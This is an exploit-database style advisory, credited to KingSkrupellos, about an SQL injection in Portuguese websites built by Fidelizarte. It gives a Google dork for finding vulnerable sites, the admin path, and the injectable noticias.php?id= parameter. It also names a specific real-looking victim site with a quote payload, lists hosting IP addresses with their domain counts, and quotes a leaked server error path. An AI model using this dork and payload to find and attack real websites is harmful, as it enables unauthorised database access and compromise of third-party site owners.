facebook facebook twitter rss

Desenvolvido por Fidelizarte Web Design Portugal SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
####################################################################

# Exploit Title : Desenvolvido por Fidelizarte Web Design Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : fidelizarte.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Fidelizarte'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Admin Panel Login Path :
*************************
/admin/

# SQL Injection Exploit :
***********************

/noticias.php?id=[SQL Injection]

###################################################################

# Example Vulnerable Site :
*************************

[+] jetexpress.pt/noticias.php?id=2%27 =>

[ Proof of Concept ] => archive.is/ysmky

Note : (185.15.22.176) => There are 112 domains hosted on this server.

Note : (185.15.22.148) => There are 36 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

Fatal error: Call to a member function fetchAll() on a non-object in

/home/jetexpre/public_html/noticias.php on line 139

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :